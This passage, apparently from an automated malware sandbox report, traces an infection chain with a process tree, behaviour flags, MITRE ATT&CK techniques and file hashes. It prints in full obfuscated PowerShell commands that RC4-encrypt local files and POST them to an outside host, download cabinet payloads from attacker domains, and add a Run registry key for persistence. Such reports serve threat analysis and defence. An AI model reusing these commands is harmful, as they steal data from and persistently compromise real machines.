$GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  PID:844

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\documents\49120862.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1212
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
  2⤵
  - Adds Run key to start application
  PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'https://goosess.com/read/get.php?wc=iew&vf=lk0100';$KWnAhHWFxDer = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1260
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:1828
- C:\Windows\system32\timeout.exe
  timeout -t 5 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_down.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d1.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_docu.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d2.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_desk.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d3.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_sys.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d4.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=AYFLYVMK.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1352
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:1880
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=AYFLYVMK.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:2164
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b4de7046147797d80da08b19d4fd4183

SHA1
eed524a53be0f850f8028b08773c4632aaa5cb5e

SHA256
cdbeb16d136eec7a8306faf2f99e30ff3097a8a927b01f6956dde27fa9811e40

SHA512
